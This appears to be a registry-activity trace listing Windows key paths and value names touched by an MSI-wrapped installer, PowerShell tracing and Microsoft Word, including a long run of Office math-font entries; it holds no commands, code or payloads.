HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\54841c.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\54841c.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C6F01EDE4F03AC245B7CDA9B504EB5CF
1262DCB2BD506E446B5DA9F0EF8C396A
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\EXEMSI.COM\MSI Wrapper\Installed
LogonUser
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\EXEMSI.COM\MSI Wrapper\Installed
USERNAME
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\EXEMSI.COM\MSI Wrapper\Installed
Date
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\EXEMSI.COM\MSI Wrapper\Installed
Time
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\EXEMSI.COM\MSI Wrapper\Installed
WRAPPED_ARGUMENTS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
LocalPackage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
AuthorizedCDFPrefix
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
Comments
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
Contact
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
HelpLink
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
HelpTelephone
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
InstallDate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
InstallLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
InstallSource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
ModifyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
NoModify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
NoRepair
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
Publisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
Readme
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
EstimatedSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
SystemComponent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
URLInfoAbout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
URLUpdateInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
VersionMajor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
VersionMinor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
WindowsInstaller
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
Language
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
AuthorizedCDFPrefix
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
Comments
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
Contact
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
HelpLink
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
HelpTelephone
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
InstallDate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
InstallLocation
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
InstallSource
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
ModifyPath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
NoModify
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
NoRepair
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
Publisher
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
Readme
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
Size
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
EstimatedSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
SystemComponent
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
URLInfoAbout
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
URLUpdateInfo
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
VersionMajor
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
VersionMinor
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
WindowsInstaller
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
Version
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
Language
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\55C62D1BFD607B6439D46D762E728553
1262DCB2BD506E446B5DA9F0EF8C396A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\InstallProperties
DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}
DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\1262DCB2BD506E446B5DA9F0EF8C396A
ProductFeature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\Features
ProductFeature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Windows\Installer\{2BCD2621-05DB-44E6-B6D5-9A0FFEC893A6}\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\1262DCB2BD506E446B5DA9F0EF8C396A\Patches
AllPatches
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A
ProductName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A
PackageCode
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A
Language
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A
Version
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A
Assignment
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A
AdvertiseFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A
ProductIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A
InstanceType
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A
AuthorizedLUAApp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A
DeploymentFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\55C62D1BFD607B6439D46D762E728553
1262DCB2BD506E446B5DA9F0EF8C396A
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A\SourceList
PackageName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A\SourceList\URL
1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A\SourceList\Media
1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A
Clients
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A\SourceList
LastUsedSource
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\1262DCB2BD506E446B5DA9F0EF8C396A\SourceList\URL
SourceType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings
StringCacheGeneration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
wextract_cleanup0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
-d'
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
ce'
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
qh'
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\65DD9
65DD9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
